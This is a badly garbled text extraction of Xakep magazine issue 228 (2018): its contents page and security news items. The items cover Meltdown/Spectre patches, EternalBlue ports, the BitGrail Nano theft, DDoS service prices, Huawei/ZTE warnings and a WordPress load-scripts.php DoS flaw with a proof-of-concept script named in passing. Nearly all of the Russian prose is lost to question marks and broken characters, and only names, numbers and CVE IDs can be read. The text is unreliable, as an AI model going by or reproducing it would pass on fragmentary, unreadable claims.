ХАКЕР №228 2018

????�18
?�8
CONTENTS
MEGANEWS
???�????�?�??�?????�????
???�????燗ndroid
???�??�??�?,�??�????�?��??�??�??�?�?????
??�??�???�???�??????
???�???�???�營CO��??�???�???�?��????�???�????�????
???�??�??�???�?�??營CO
???�???�?�??????�??�????�?????�??�??????��????營CO
???�??�??�??�???
????�?�??�?????��??�???�???�?�????�???�??�??�??�??�??�?�燱indows
??�?牜???�?粻??????,��??��??�?!
??�????�?��???�??????�??�????�???�?燱i?Fi
??�??�??�?牜????�?�
????�?�??�?????燬QL????�????�??�???�????�?�?�??�???�??�????�?�燡oomla
????�???�??�????
???�???�?�??�????�?�??�??�?�??�?????�??燬SL/TLS��??�?????�??�??�?
][??????�??:�??????�??�?�?�???�???
???�??�???�??�?????�?�??牜????�?????�??�?????�?�
??�??�??�???
????�?�??�??�??�?????�??�????�??�??�??????��?燩alo燗lto燦etworks
????�?�?�??�??�?
???�??�???�???�???�??�?????�???燱indows��???�???�??�??�?
???�??�?????�??�?
????�?�??�??�??�?????�????�??�??????��??�?????燬quirrelMail
???�????�??�????�??
????�???�??��????�??�???�??��??????燜rida
??�??�?????�??�???�????�?
???�???�???爄OS�,�??�??�??�??��??�?????�?�????�????�???�?
??�??�??�?燗ndroid
???燗ndroid�????�???????�??�??�????��??????�????�???�?????�??
Android�??�???�????
??�???�???�???�???��???�?�燣inux
??�???�?�???�??�燣inux
???�??????,�????�?????�??�?�???�?��??�???�???�??�???
WWW
??�????�??�??????�???
??�???�????�???
????�?�???�?????,�?????�?�?�??�???�??�爏andbox????�????
Mining燩ool�?燡ava
??�??�??�??�????�??�??�???????�??
???�??��???�?
????�?�??�?????�??????�??�??????�?�????�?燦odeMCU�+燗zure營oT燞ub
??�???�?�?????�???�???
??�??????��??????:�?????�?燞ackerU
???�????��???�???
???�?????�??,�??�??�???�??��??�?燣inux????????
PICO-8
??�???��????�?�????�?????�???�????,�??????�????�?�?�???
?????牜Mifrill粻????????
nefedova@glc.ru
?????�??????
?????
???�??�???�?� ??????� ???� ??????�???�?� ???�???�??� ???�????�??� Meltdown
?燬pectre,�??????�??�????�?�???�????�?�??�??�????�??��?�???�??
???�??�???�,�??�???�???�?,�?????�???.
??�??�?,� ???� ???�????� ?� �????粻 Meltdown� ?� Spectre� ???�??� ???� CVE:
CVE?2017?5754�(Meltdown),燙VE?2017?5753�(Spectre,燰ariant��燙VE?2017?5715
(Spectre,燰ariant�.�???燤eltdown�燬pectre,燰ariant���?????�??�?�?????�
????�?�???�?�?,�?�??�??�?????�????燰ariant�??�???�??�?�???????�
???� ???�??�?/BIOS/???�?????,� ?????� ????� ?� ???�???�???�??� ???�????� ????�
?????�?????�??�????.
???�??� ?� Meltdown� ?� Spectre� ???�??�?� ????�?� ???�?????�??�???� ???�?.
???�????�?�???�???????�??????�??��???�????�?????�???��?????�?
????�?� 2018� ????� (????�??� ???????� ???�??� ?� 90� ????� ??� ????� ???� ????
?????�???�?�??�???�?��???牜???�???????�??�???�??�????�??��??????�
?????�??�??�).�???�?�???�?�??�??��??�??�???�?�???�?,���??????�
????� ??????� 2018� ????� ????�???�?????� ???�?????� ???????� ???�?� ????�
??????�??�?�??????�???�??�??????�????,�??�?�??�??�???�???�????�
??,�??�??�??.
?�?????�???�??�?�??�??�?�??�??�??�??�???�??�???�??�????�???
?� ????�?.� ??????�????� ???�?????� ?????�????�?� ?� ??????�???� ????�?????�
????� ??????�??,� ??�???�?� ?????� ?� ??????� ???�??,� ???�???�???�?� BSOD
?� ???�??�??????�????,��??�?�????�?� ???�???�??�???�?????�????.��???�
??� ?� ???�?� ????�?� 2018� ????� ???�????� Intel� ???�???�?� ???�???�???�?� ????�
???????�????�?????�????�??�??�????�?燬pectre�(Variant�,�???�??�????�
??????�??��??�???�???�??�?????�??�???�?�??�???�?�?????�???�???�
???�??�??????.
??�??�??�??��??�??�??�?�???�???營ntel�???�?�??�???????�????
???�?????� ???� ???�??�????� ??� ????�??�???� Skylake,� ?� ???�?� ???�?� ???� Kaby
Lake� ?� Co?ee� Lake.� ???????�??� ????�????�???� ???� ???�???,� ????�???
?� ????�???� ??????�??� ???�??�????� ?????�?� Intel� Core,� ?� ???�?� ???�??�????
Intel燙ore燲,營ntel燲eon燬calable�營ntel燲eon燚�(???�?????�??�??????�??????�
????�?��???????��???????�???).
??�??� ???�????�???� Intel� ????�??�???� ???� ????� ???????�??� ???????�?
Microcode� Update� Guidance,� ???�????� ??????�?� ?????� ???�?????� ??????
???� ???�???�??� ???????� ???�??�????� Haswell� ?� Broadwell.� ???,� ??????�????
???????� ???????� Broadwell� ?� CPUID� 50662,� 50663,� 50664,� 40671,� 406F1,
306D4� ?� 40671,� ?� ???�?� ???� ???�??�????� Haswell� ?� 306C3,� 4066,� 306F2,
40651��6C3.�??�????�?�??????�?????燙PUID�???�??�?��??�??�????
?????燲eon�燙ore.
???�?� ????�???,� ???� ???� ??????� ??� ???�?????� ???�?,� ???????� ???�??�?
?????�???� Intel.� ???�??� ????� ????� ???� 16� ?????� ???�??�????,� ?� ???� ???�?
????燬andy燘ridge�營vy燘ridge.�??�???�??�???�?????�?????�????�??�??
????�??,�????�??�???,�??�??�?????�??????�?��??�????�?,�?�??�???
Pre?beta�燘eta.
???�??�????� ???�??� ??????� ???�??� ????�???� ???�?????� ??� ????�?� ?????�
??????�??.� ?� ???�?� ????�?� 2018� ????� ???�?� ??????�?� ??????� ???� ??� ?????�
??????� ?� ???�????� ???�?????� ???�????�??� ???�???� ???�???�?� Intel,� AMD,
ARM,燗pple,燗mazon,燝oogle�燤icrosoft,�?????�????�???�?��????,�??????
????�??�??�??�??�??????�??�?�??�????�??燬pectre�燤eltdown,���???�
?????�??�????�?????�??�????,�??�?????�??�????�?�?????�????.
???�????� ????�??????� ????�???,� ???�?� ??????�?� ??????� ???� ??� ?????�
??????� ?� ???�????� ????�???� ???�????� ?� ????�?,� ???�??� ???�????�??� ?????�
????�??.� ???�???�???�?� ????�???� ??� ????� ???�??� ???� ?� ??????� ????�
????�18�???,�???�?�?�???�?�???�???�???�???�???�??�??.
??�??�??� ???????�??�??� ?� ????�??�??� ????�????�?� ????� ?????� ????�
?????� Intel.� ?� ???�???�?,� ????�??�???�?� �????�???粻 ?????�?� ???�???� ????
??�???�?�??????�??�????:
�?� ????�?� ???????�??� [?� ???]� Intel� ???�??�???� ???�??� ?� Spectre
?燤eltdown�???�??�??�???�?,�??????�??�?�?????營ntel�???�???
???????�????� ????�?????�??� ????�??�??� ???�??????�,� ?� ???�??� ????-�
??營ntel.
???�????�?� ???� ????�???,� ???� ????????�??� Intel� ???�?� ???�????�??� ??????
????�??� ?� ???�??�??� ???�?????�??,� ??� ???�????� ?� ?????�?????� ?� Spectre
?� Meltdown� ??????,� ???�?� ????�?� ???�?� ???.� ????� ????�????�??�??� ????�?
???????�??� ?� ????�?� ??????�?� ???�????� �???�???� ????� ???�?� ??� ?????�?
??????�????粻 ?� ???�?????� ?� ????�????� US?CERT,� CERT/CC� ?� ???????
?????�???�????.
???�?�??�??�?????�???�?�???????�?�??�????�??�??�??�???燬pectre
?燤eltdown�?�??�????�??�??�???�?????????�???,�??�??�?��??�?�???,
???�????�???�???��??�???�???�?�??�??�??�?�???�???�??�????�??�???�
?????�?� ??� ????�??.� ??� ???� ????�??�???�?� Intel� ????�???,� ???,� ???�????� ??
???�??,�???�??�??�??�?????�??�??�??????�??�???�?�????.��????
??� Intel,� ???�?� ???� ?� ????�??�???�?� ???�??� ???�????,� ???????�???� �?????�
???????粻 ????�??� Spectre� ?� Meltdown� ?????� ????�?� ?� ????�???,� ???
???????�??� ??� ???????�??� ???????� ????�???�??�???� ????� ???�????
?� ?????�???� ????�??�???� ???�???�??.� ???�?� ???� ???�??� ????� ????????
?????�???�????�?�??�??�??�??�??�?�??�????牜?????�.
??�????�??�??�?�??�?�????�???�??�?���??�????�??�???�??�??�??
???�????.��??�???,燤icrosoft�???�???:�???�???�??�????�??????�??�?
?� ???,� ???� ???�?� ???� ???�????�??� ?????� ???�???�?????� ?� ??????�???� ?????�
?????�???�??�??�???.�??�????�???�???????�??�??�?????�??�???�????�
???� ?????�??� ???????,� ????�?� ???�???� ???� ???�?????� ????�?� ????�?,� ???
???�???�?�???�???�?�??�???�???�???�燤eltdown�燬pectre�??�?�???.
37%�??�??�???�???�?????�??�??�??�?????�
????�?????
???�???�?牜??????�????�??�??�??�?粻???�??�???,�??�??�???�??�????�??�??�????�????�
??????�??�?????�???.
?� ???�???�?,� ????� ???�?� ???�?????�??� ?� ????�????� ???�?� ???????.� ??� ????�??� ?� ???�??
??????� ????�?� ???� ??????�????,� ?� ??????�?� ????�?????�??� ???� ???� ???�?� ??????�?� ???????�
???�??�??�??�??�????�??????,�??????�?�????�????�???.
28%�?????�???�??�??????�??�????��???�??,�� 9%��?�??�??�?????,�??????�????
?� ?????�??�??.� 11%� ??????�?� ??????� ???�??�??,� ?� 8%� ???�???�?� ??� ?� ??????�??� ???�?
??�????�??�?.
???�????�??� ??� ???� ???????�???� ???�????� ???????� ?????�?� ?� ???�??� ??????�?� ?????� 6%
????�?????�??.
?????????�??
???�???�?????
WINDOWS
???�??� 2017� ????� ?????�???� ????�?� The� Shadow� Brokers� ????�?????�?
?� ?????�??� ???�???� �???�??� ??????�????�,� ???????�??� ?� ???�????�???
????�????.� ???�?� ??????� ????�???�???� ???�??�??� ?� ???�??�??�?,� ????�???�
???� ?� Equation� Group� ?� ????�????�?,� ??� ???????� ???�?� �??�?????�????�??
??????粻 ??� ???.� ?� ??????�???� ???�??????� ???????� ?????�???�????� ???�?
?????� ????�??� ????,� ???� ???�??�?� EternalBlue,� ???�?????�??� ??� ???�??�???�
???�??�????�?��??�???�?燬MB�(????�?�?�?????�????�?�??�??�???????�
?????�??�?????�???燱annaCry��??�17�???,��????�?�??�?�???燦ot?
Petya�燘ad燫abbit).
???�????�17�???�??�?????�?�??�????燫iskSense�??�??�??�(Sean
Dillon)� ?� ?????� ?????� (Dylan� Davis)� ????�???,� ???� ??� ???�???� ????�???????
???�??�?� EternalBlue� ???� ??????� ?� Windows� 10.� ?????�?,� ???� ??� ???� ??????
???�??�???� ???� ??????�??????� ?????� ?� SMB� ???� ???� ???�?????�?� ???� ????
??燱indows燲P,燱indows燰ista,燱indows�燱indows燬erver�03�燱indows燬erv?
er�08,�???��?????�??�??�???�?????�?�?????�??�???�???�?�??�????.
???�?� ?????�???�????� ???�???� ??????�???�???� EternalBlue� ???� ??????
?燱indows�燱indows�1�燱indows燬erver�12.
??�???��???�??????�??燭he燬hadow燘rokers�??�?�????�?????��???�
???�??�??�??,�??�??�????�?�????�????�??,�?�????�???�???�???�??.
???�??�??�??�?????�??�??�??�??�??�??�??????��17�???�?????
?�?????� ??�????�?�??�??�??�???�?.�????�???�???�??�???�???�?????�
??????� ????????� ???� ???�??�???� EternalChampion,� EternalRomance� ?� Eternal?
Synergy� ?????� ????�??,� ???� ??????� ???� ???�??�??�?� ?????� ??????�?????�?
???�??� ?????� ???�??� Windows,� 32????�?????� ?� 64????�?????,� ?????�??
??�??�?????��??�(???????�燱indows�00).
???�??� ???� ????�??????� ??????�??� ???�?� ??????� ???� Metasploit� ?� ?????�
???????�???????�???� ??燝itHub.�??,燙VE?2017?0146�(EternalChampion,燛ter?
nalSynergy)� ???�???�?� ????�???�?????� ???�?????� ???�?� ?????� transaction?
???�???,� ?� CVE?2017?0143� (EternalRomance,� EternalSynergy)� ???�??�??�???
????�???�???爐ype燾onfusion�??�?燱riteAndX�爐ransaction????�?????.
??�????� ???�????�???,� ???� ???�??� ???�??�??�?� ????� ???�???� ??????�
??????�?� ?� ???�??� ????�???� ?????�???�??� ?� ????�????�???� ???� ???�??????�
???� ?� ???�????�?� ????????�??� ?????�??� ????�??.� ??????�??????� ????� ????�
???�???� ???� ????� ???� ????�?� ???�????� ?????�?� ???�???� ???�???�????�?,
?�????�?�????�??????�?????�???�????�?�????�??�???�??�?.
?�???�?????�?�??????�???�???�???�????,�????�???????�??�???�??�???�??���????
??????� ?????� ????�???�?� ???�?� ??� ????.� ??� ????�????�?� ?� ???� ???�?� ????�?� ???????,� ???
??????� ????????.� ????� ??� ????�????� ??????,� ???� ???�?� ???�???� ????� ?????�????,� ???�????�
?????�???�?��??�??�??�???????�???�??�
?�?�????�??????�??�??�?????�?�???�??????�??�??????�??��??�?燭witter
?????燘ITGRAIL
?????????????
?????�?????
?????�?????� ????�??????�??� ???�?� BitGrail� ???�??�???� ??� ???� ????�??�???
???�???�????�??.��?????�?�????�?�?????�?�????��??�?????�????
Nano� (XRB,� ?????� ???�??� ?????� ???� RaiBlocks),� ???� ????�????�??� ???�???�
??�0�??�?????�??�????�?�?????�??�??????�??�????�???�???�????
??� ????�??�?.� ???�?� ???�????�???� ????�????� Nano� ???�?????�?� ??????�?
?�???,��?????�??�?�???�?�??�????�?�??�??�?�5�??�?????.
??�????�?,� ???� ?� ???�????�??� ????�????,� ????�??????�??� ???�???�?,
??????�??�?� ???�?� �????粻 ???� �??�?�.� ????� ????� ?� ???�????�?????� �????�
??????�??�??� ????�????�?�,� ???????� ?????�?� ????�?????� ???�??�?.� ?????�
????�?,� ???� ?� ??????�???� ???????�???� ????�??�?� ???�??�???� ????�?� ?????�
??????�?燦ano,�??????�?????�?�?�?????�?�??�?.�??�???�?????�???�
???�?� ???�???�????� ???� ???�????� ???� ????� ????�??????� ????�?,� ??� ????
????�?� ???� ?????�?� ?????�??� ????� ?????�????.� ?� ???�??�???�??� ???�???�
???�???�??�??�??�?????�??�???�???????�??�???�?.
??�???????��??�????�??�?�???�????�?????�(Francesco燜irano),�???�
??�????�???�??燭he燘omber,�?�????��??�?燭witter,�??�??�????�?�????�
??� ???�??????� ???????�??� ?????�??� ????� ???�??�??�??,� ???� ???� ?� ????�
??????� ???�?� ?� ???�?????�??� BitGrail� ????�???� ????� 4� ???�????� Nano,� ???
???�?????� ???�????�?� ???�??�?� 40� ???�?????� ???�????.� ???�?� ??????
????�??,�??�??�????�???燦ano�?�???�?�??�????�???�燘itGrail.
?� ?????� ??� ???� ?????�?� ???�????�?� Nano� ???�?????� ????�???????� ????
???�??�??�??�?????��??�????�??�??�?�??�???.�???��??,�??�?????
???�?� ??????,� ???�?� ???�????� ????�??�?� ???� ?????� ?????� ???� ?� ???�???�?
Nano.� ???�????�???� ?????�??� ???� ??????� ?� ??????�?,� ???� Nano� ?� ???�??
?????�?,��???�???�??�???�?????��?燘itGrail.
??�?� ????,� ???�????�???� ????�?????�?,� ???� ??????� ?� ????�??�???�?� Bit?
Grail� ???�?� ?� ???�??�??�??� ???�?,� ?????�??� ????� ??????�?� ??????� ??� ??
????�??� ??????,� ?� ????�?????�??� ?� ?????�?� Nano� Core� ?????�????�???�?
???????�?.� ???�?� ????�???,� ???� ???�?� ???�???�???�?� ???�????� ?� ?????�
??????�??� Nano� ???� ?� ????�?� 2017� ????,� ????�????� ????�?????�??� ????�
?????�?????� Nano� ?� Bitcoin.� ?????� ????�?????�??� ???�?� ???�?????� ????�?
??????�????,�??�???�????�?�????�?��??????�??????.
?�??�?�??�?�????�?燦ano�???�???�???�??????�?,��??????�?????
????�????�?????�?????�??�??????�??�?????�???�???�??�????.�??�?
???�?�??�????�???��??�?�???�?????�?�?????�??�??�??�????�?牜?????�
??????�??�??� ????�?????粻 ?� ????�???,� ???� ???� ????�??�???�?� BitGrail� ?????�
????�???��???�??�????�???,�????�???�??�??�???�??�???�???�???�???�
?????.
??�?�?�??�??�????��???,�???�???�??�???�?????�??�??�????�???
???�????�????� Nano,� ???�?� ???� BitGrail� ????�???� ?� ?????�????�??,� ??????�
?????��???��??�?�??????�爀xit爏cam.�??�?�???,�???�?????�?�??�???�
???�?????�??�?????�??�?????�???�????�???�???.
DDOS????�?�?�??�??�?�???????�??�?
??��??�????
????�???�?�??�????燗rmor�??�???�?????�??�??�?�???�??�??�????�??�??�??��??�???�
??��??�??�???,�????�?�??�??�??�?�??????�??��????�???�?????�??�?�???�?��??�???.
DDoS????�?�???�??�?�????�???�� 10�??�????�?�???�??�??� 200�??�????�?�???�???.
???�?�??�???�?????�?????��????�??�?�0?1200�??�????.
????�?� ???�????�???� ???�???� ?????� ???�??� 750� ???�????� ?� ?????� (?� ???????� ???�??�?????�
??????)�??� 1200�??�????��????�(?�??�??�??�??�????�?????).�?�??�????�??�??�???�
???�??�??�?�?????�??�0�??�????.
??�???� ???�??�???� ???????�???� ????�???� ???????� ???�???�???�?:� ????�?� ???????� Disdain
????�??�?�� 1400�??�????��????,�??�?�??�????�???�????�????燬tegano�??�?� 15�0
???�????��????.
????�??�??�???�??�?�?�??�????�??�?�??�??????��??�??�?�?�0?1500�??�????.
???�?????� ???�???� ???� ????�?� ???�???�??� ????�???,� ??� ?� ???????� ????�?� ????�??�???:
??� 50�??�????�?�??�??�???�??�??????�??????�??� 100�??�????�?�??�??�?�??燱ord?
Press� ??� 1500� ??� ??????� ???� Android� ???� 650?1000� ???�????� ??� ???�??� ???�??�???� ???� Mi?
crosoft燨f?ce.
?� ???�???� ???�?� ???�?� ????� ???�?????� ?????�???� ????�??� ?� ??????�??,� ???�?????� ???????
?????�????�?�?��??�????.
??????????�??
??????燞UAWEI�
ZTE
??� ???�??�??� ??????�??� ???�????�???� ??????�?� ??� ???�????� ??????� ????�
????�?� ???� ????�?????� ????�?� ????�??�??� ????�????.� ???�?� ???�?� ???�?
???�????�???�???????,�???�??�??,�??��??��???�????�??�??�????,
?????�?,� ???� ????�??� ???�????�???� ????�????� ??� ???�?� ????�?????�?
??????�???�?�??�????燞uawei�燴TE�????�???�????�??�??�?.
??�??�??� ???� ????�????� ???� (Chris� Wray)� ????�??,� ???� ???�?????�???
�??�???� ????�???�??粻 ???�???,� ???????� ?????� ???�??????,� ????� ???�?????
???????�??�??�????�??�???�???�??,�??????�???�???�???�??�?????�???
???�?� ????�?� ?� ??� ???�???�?� ???�????�???� ???�?????,� ??????� ???????�
??????� ???????� ?� ???????�?????�???�??� ?????� ???.� ???�?� ???� ???????
?� ???,� ???� ???� ???� ???�???� ???�????�???� ??????�???�??� ?� ??????�?� ????�
???,� ???�?� ????,� ???�????� ???� ????�???�??� ?� ?????� ??????�??� ??????�?
????�?????�??�???????�??�???�???�??�??�?.
?� ???�?� ????�????� ???�?� ????�????� ???�?� ??????�?� ???�????� Huawei
?燴TE,�??????,�?�?�??�??,�??�?�??�???�?�???�???�???�??.
???�?� ????�???,� ???� ???�??� ?????�?� ???�????� Huawei� ???�???�???�?
??????�???��?????�?�??�????�???�????�,��??�???�?,�??�???�???�???�
??????� ???�????�??� ?� ???????�?????�???�??� ???�???�??� AT&T,� ????�?
?� ????�?� 2018� ????� ????�?� ???�?????.� ?,� ???� ?????�??�?� ???,� ??� ???�??
???�??�???�?�???�?�????�??�????�?�??�???�???�??�??.
????�??�???�?� Huawei� ?� ZTE� ???� ??????�?� ????�??�??� ????�?????�?
???????�???�??�????�???�???�????.�??,�燞uawei�????�?,�??�??�??�??
???�????�?????�?�??�?????�???��???�?????�?�0�????�???�燞uawei
????��???�??�?�????�???�?�????�??????�????,�??��????�??�??�???�
????�?????� ?� ???????� ???????�???�?????�?????�???�??� ???�??????.� �?
???�???�?�????�?��???�????�?�???,�??�???�?�,��??�??�??�?�????�
???�???�?�??�????.
???�????燴TE,��???�??�???,�???�???,�??��??�?????�???�???�???
????� ????�???�????� ???????� ??� ???�????�???� ???�?� ?� ????�?� ???�???�?
???�???�?�??�?????��???�??�??�??�??�??�???�??.�??�?��??�????
????�???,�??�???�???�??�??�??�??燴TE�??�??�??�?�???�?�??�???�???�
???��??�??�????,�??�???�????�??�??��??�??�??�????�??.
700�0�??�????�??�??�???�??�??�???
??燝OOGLE燩LAY��17�???
????�????燝oogle�??�???�??�?�17�???.
???�???�?燝oogle�??�??�???,�??��???�???�??�??�???�??�??�??�燩lay燬tore�??�???�???�
????�?� ???�??� ???????�??� ???�???�??.� ???�?� ???�???�????�?� ??????�???� Unicode� ?� ??????�
???????�??�??�?,�??�?�?????�??�????�??�???�??�?�????�???�??�????,�??�????�???
???�????.
??�??�?�??�????�???�?????�?�??�???�??�???�??�???�????� 700�0�??�????�??�???�
????�??� ?� ???�?????�???� ?????� 100�0� ?????�??????�???� ???�????�????.� ???� ??????�???
???�?�?�%�??�???�?�?????�???�16�???.
???�????�?�??�????�???�?????�?�??�???�??�????�???�????�0�0�??�???�???????�
????�??.
15�0�0�???????
?????????
??�????�??牜?????�???粻???�???????�??燬kyTorrents�???�??�???�???�????�
????�???�?��??�????�??�??�????��??�????.
SkyTorrents�??�??�??�??�?�???�???�????,��??�?�??�???�?�??�???
???�?� ?????�?,� ???� ??� ??� ???�?� ??� ?????� ???????� ???�???.� ????� ???�??
?????????��??�?�???�????�?�???�????,�??�??�??�??�??�??�???????�
?????,��??�??�???�??�?????�??????�???�???????�???�???.
�???�???�??�?�??�??�??�?�??�???�??�????�??�??.�??�?�???
????�???�??�????�??�???????,�?�????�??��??�?�????�??�????.
???�?� ??� ?????� ????????� ??????� ?????????� ???,� ???� ???�?� ???-�
?????�??� ??????�??,� ???�???�?� ????� ????�???� ?� ????� ??� ???-�
???????� ???�??�???� ??� ???�???� ??????�??�??� ????�,� ?� ??????� ???-�
????�?燬kyTorrents�??�????.
?� ??????�??,� ???????� ???�???????� ??� ???�????,� ???????� ????�?????�?
????�???�???�????�?.燬kyTorrents�????�??�??�????�?�??�??,�??�?�???
?????� ??????�?????� ???�???�?� ???�?????� ??????�??� ?� ????,� ???�??� ???�?
?????,� ?� ????�?� ?� ???� ???�???�???� ?� ???�???� ??� ?????�????� ?????�?.� ???,
???�????�??�??�?�??�????�?�00�??�????,�,�???�???�??�??�???燬ky?
Torrents�?????�???�???????�????�??�????,�??�?�???�??�????�?.
?� ???�?� ????� ????� ????�?????�?� ???�?� ???�???�???� ???�???�??� ???�???
??????�???�???� ??????� ???�???�???� ???�???,� ???� ???� ????� ???�?????� ????�
?????��??�?�?�???�????��??�???�????�??�????�??�?.�??,�???�???�
???�??� SkyTorrents� ????�?� ???�??� ??� ???�?,� ?� ???� ???�?� ?????� ????,� ???� ????�
????�??�??�???�???�??�??�????�???�?????�??.
???� ???� ????�?� ?� ?????�?� ?� ???�?� ?????�?????,� SkyTorrents� ???� ??� ?????�
?????�?????,�??��???�??�???�??�????.�???�?�??�??�?�???�?�???
?� ??????.� ???�?� ????� ???�???�?� ?????�?� ????�???� ??�???�???� ????,� ????�
??????�???� ???�?� 15� ???�?????� ???�?????.� ?????� ????�???� ?????� ????�
??????� 444� ?????� torrent????�??� ???� ???�???� ????�?� ????,� ???????� �????�
322�????.
??�??�?� SkyTorrents� ????�???,� ???� ??????????,� ???�???�????�???� ?????
?????�?,� ???�????� ???�??,� ???�??�??� ???�?????� ????� ???�??�???� ??� ????�
????牜?????�??�?粻????�????�??.�???�??,�??�?????�?�???�???,�???�????�
????�?�??�???�??????�??�??�??�????��???�?�??�?????�??�?.
?�???�??� ???�??�????� ????�??????� ?� ??� ???�??�????.� ?� ?� ??� ?????,� ???� ???� ??????.
??????,� ???�?� ?� ???�?????�??� ????� ???�???????� ?????�?????� ????�????� ?????�??� ???????,
????�????� ??� ????�?� ???????,� ?� ???�?� ????�?????�??� ???�????�??.� ?� ???�?????� ???�?� ?????�
??????�?� ??????�???�?� ???� ?????�?� ???�?????� ?� ???�??� ???�??????,� ???� ???� ???� ???�??� ????�
???????,� ???????� ???�?� ???�????� ???�????� ?� ????�?� ?????.� ???�?� ?� ???�??,� ???� ???�?� ????�
????�??�??�??�??�?????營CO��???�??????�??�???�???????�??�?��??�?????�??�??�????�
????�
?� ????� ???�?� ????�???� ??� ???�??� ????�?????�?� Reddit� ?� ????�?????�??� ?� ????� ???�??� AMA
(Ask爉e燼nything,牜????�???�???��??�???�?�)
??????????? ??????
?
? �?????�?????
ANDROID燩�?????
?????????????
??�????� XDA?Developers� ????�???,� ???� ?� ?????� ???�??� ???�???�????� ????�
????� Android,� ???????� ????� ?????�??� ???� ???????� ???�???�?� Android� P,
??????�?�??�??�???�????,�??�??�??��??????�?????.
???,�燗ndroid燨pen燬ource燩roject�(AOSP)�???�???�???�?�??�??�???,
???????� ????�???� ????�???�???� ??????�???� ?� ???????� ??????� ???�????�
???,�?�??�????�?�???????�??�??��??�?????�??�?????�?????�???�???�
??�??�???�???�???�??.�??�????�???�????,�??�??�??�???�??�??�????�
????� ??????� ???�??� ???�??� ????�?????�??.� ????,� ???�????� ???�???�??
???�??��?????��??�?????,�??????�????�??�???�?�????�???�?��??,
???� ????�???�???� ???�???�??� ?????� ??????�?????� ???� ???�??�????�????
??�??�??�??,�?�???�???�??�??�????�?.
???�?� ???�???,� ???� ?????�??� ????�???�??� ???�?????�???� ???�?,� ???
???� ??????�???�???� ???� ??� ????� ???� ???�??�??�???� ???�?????� ?� ??????
??????�??�??�????�??�???�??�???�?�?�?�??�???�???.
???�???�?,� ???� Android� P� ???�??� ???�????� ???� ???�?????�??
?�??�18�???,�?�???�??�??�??�?�????�??�??�?�??�??�??�???�???
???????�??�?��??�???�???�??�????�??燝oogle營/O.�??�????�??�????
?????� ???�??� Android� ???�?????�??� ???�???�????�?� ??� ???????????�
?????�18�???.
???�??�??�????�???�?????�??燬TACK燨VERFLOW
??????�??????�???�?
????�??�??�???�??�???�?燬tack燨ver?ow�??�????�????�??�?�??????�???�???????�???
????,�??�?�??????�????�??�???�??�??�???�?�?????�?�???�??�?�??�????�????.
??� ????� ???� ?� ????�?� ???�???� ????�??� 101�2� ????�?????�?,� ???????� ????�?????� ????�???
??�??��??�??�??�???�?????�??�????.�???�?�??�????�???????�?????�???.
??�??�??�??????�??�??�???�???�????�???�??�/�??�????�/�??�????�??�???�?
??�??�??????�??�???�???�?
??�??�??????�??�???�??�??
??�??�??????�???�??�???�???�???�????�???�??
??�??�??????�???�???�???�????�???�??�??�???�??�??
????,�??????�??????�???�??�??�?????�?�???�?�??�?
????�??�??�?,�????�??�?????�??�???�?�??�??��??�??�???�??�??,��??�?�??�?
???�?�??�????�?�??�?????�??
WORDPRESS:
?????????
??????????
5� ???�???� 2018� ????� ???�????�???� WordPress� ????�?????�?� ?????� ???�??
CMS�(WordPress�9.3),�??????�??�??�???�????�???�??�??�??�???�??,
??� ?� ???�?� ???�??�?� ???????�?� ????????� ????�???�??�??� ???????�??,� ????�
????�???燙MS�????????�?�????�??????�?,�??�???�??�???�?????�?.
??�?� ????�?� ???�??� ??????�?� ?� ???� ??� ???�?????� ????� ???�?� ???�??
WordPress�9.4,�??�??�??�???�???�??�???�??�?????�??�???�???�????�
???�??� ???????�??,� ???�????� ???�??�??� ????�???.� ????� ?� ???,� ???� ?????�
??????�?,� ?� ???????� ???�???� ???????�??� ???� ???�?????,� ??� ??????�?� ?????�
????�??�???� ??????�????� ?� ????� WordPress� 4.9.4,� ???� ?????� ????� ??� ?????
?�??�????�??�????.�??�???�??�?�??�??�9.4�??�??�??�??�??�?�???�
?????�???�??????�??�???�??,�?�?????�??????�??.
???� ????� ?????�??� ???????� ?� ???,� ???� ?� ???�?� ???�???� (4.9.3� ?� 4.9.4)
??????�??�??� ????� ???� ????�???� CVE?2018?6389,� ?� ???????� ?????� ????�??
??????�????� ????�??�???� ??????�??????� ?????� ??????� (Barak� Tawily).� ???
???�????�??燚oS????�??????�??�???��??????爈oad?scripts.php.�?�???,�??
???�???�?� �??�???粻 ????�????�?� ?????� ???�????� ????,� ???�?????� ???� ????�
?????�?�???�??????�??�??�???.
??�???�???�????,�??�??�?????�????�??�?????爈oad?scripts.php�??�?????
???�??�?????�??�?燡avaScript�???�?,�???�?�??????�??�?�燯RL.�????
???�?� ???�?????� ????� ?????� ??????� ????????� ???�?????�?� ???�?????,� ????�
?????� ???� ????�?� ?� ????�?� ???�?????� ???�???.� ??????�???,� ???� ??????
????�?� ??????� ???�???� ???�???�????�?� ??� ????�??� ????�???�?????� ?????
?� ?????�???�??,� ????�?� ?????�???�???� ???�??� proof?of?concept� ???�??�?� ?
????�??� ??????� doser.py,� ???????�??� ??� Python.� ??????� ??????�???� ???�???�
???� ?????�??� ???�????� ??????�?� URL.� ???�??�?� ???�?� 500???� ???�???
????�??� ????,� ??????�???� ??� VPS????�???,� ?????�???� ????�???� ???�?,
�???�??粻????�???�?�2,�3��4.
???�??????� ???�??�????,� ???� ?� ????�?� ?????�??�?� ????� ??� ????�??
�???????粻 ??????�???� ???� ???????�???� WordPress� ????,� ???�??????�??
??� ??????�??� ???�??� ???�???,� ????�?,� ????� ?� ???�?????�??� ???�????�?
????�??????�????�??�??�???�?�????,�??�?�??�???�?�???�??�??�?????
?????�?,� ???�??� ???�??�?� ?????� ???�?????� ???� ???�???�????�?,� ??????
????�??燚DoS.
??�?�?????�??�?�??�????��???�???�??�????�????燙MS,�?�?�??�?
????�????�??� ???�??????� ???�????�?� ????�????� ?� ????�???,� ???� ??????
?????�???�???�??�?�?�???�?�??�???�??�???,�?�?�?�???�?�??�????�
???.�???�?�?????�???�??�??��??�???�??�??�9.3��9.4,�??????�???�
?????�????�?�??�??�?�???�?????.
?�?????�??,爌roof?of?concept�??�??�?�??燙VE?2018?6389�??�??�??�?
???�????� ?� ????.� ?????� ????,� ???�?????�?� ???�????� Imperva� ???�?????�?
????�???�??�??�??,�??�??�?????�??�???????��?????�?�?????�?????
?�???�???,�??�??�?�??�??????�???燱ordPress�??�??�????�???�??�??,
???????�??�??�??�???�??�??�??.
??�???�???� ???�???�?� ???�??,� ??????� ????�??????� ??� GitHub� ????�????�
???� ????燱ordPress,� ?� ???????� ???�??????� ?????�???.� ???�?� ?????�???�???
???????��????�??�??�??� bash???????,�??????�??�???�?�????�???�????�
